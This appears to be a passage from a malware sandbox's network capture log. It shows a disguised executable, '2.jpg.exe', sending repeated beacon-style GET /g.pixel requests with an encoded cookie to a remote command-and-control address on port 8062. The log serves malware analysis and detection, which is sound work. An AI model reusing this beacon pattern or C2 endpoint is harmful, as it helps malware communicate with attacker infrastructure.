14	192.168.2.4	49744	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:10.831896067 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:11.147425890 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49745	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:11.588819981 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:11.908493042 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49746	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:12.336126089 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:12.656878948 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49747	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:13.136814117 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:13.466619015 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49748	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:14.354243994 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:14.674835920 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49749	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:15.220338106 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:15.551445961 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49750	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:15.998085976 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:16.339648962 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49751	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:16.792742014 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:17.131575108 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49754	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:17.562277079 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:17.877268076 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49756	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:18.300569057 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:18.617100000 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49759	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:19.045613050 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:19.369143963 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49760	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:19.829420090 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:20.175683975 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49761	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:20.600225925 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:20.919202089 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49762	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:21.372399092 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:21.700045109 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49763	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:22.143507004 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:22.474226952 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49764	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:22.891875982 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:23.204979897 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49765	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:23.631139040 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:23.951075077 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49766	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:24.391550064 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:24.719496965 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49767	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:25.153343916 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:25.478306055 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49768	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:25.913369894 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:26.232325077 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49769	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:26.659636974 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:26.976629019 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:26 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49770	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:27.426533937 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:27.758215904 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49771	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:28.189562082 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:28.502413988 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49772	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:28.931891918 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:29.252352953 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49773	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:29.695625067 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:30.033284903 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:29 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49774	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:30.689965963 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:31.016370058 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:30 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49775	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:32.219675064 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:32.539314985 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:32 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49776	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:32.995781898 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:33.334526062 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49777	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

Timestamp	Bytes transferred	Direction	Data
Apr 19, 2024 09:50:33.764972925 CEST	388	OUT	GET /g.pixel HTTP/1.1 Accept: / Cookie: f1RjI4OBLWTYvOAP8TYtFc6C60AXrsK8VC3EibSNpM+Fe4Wgf6whRAbZlwscCrKlEl9p/KKqXVy1dR9cUSetj99Jwa4sYMNTH3J9WY/vnLXRwj5uCu02xtJJfBjQYg+rBute9l4ymgPcjeDPPNkpiW1nAUkiRKRUdE1kh55rVds= User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET4.0C) Host: 8.218.236.5:8062 Connection: Keep-Alive Cache-Control: no-cache
Apr 19, 2024 09:50:34.093440056 CEST	115	IN	HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 07:50:33 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49778	8.218.236.5	8062	7272	C:\Users\user\Desktop\2.jpg.exe

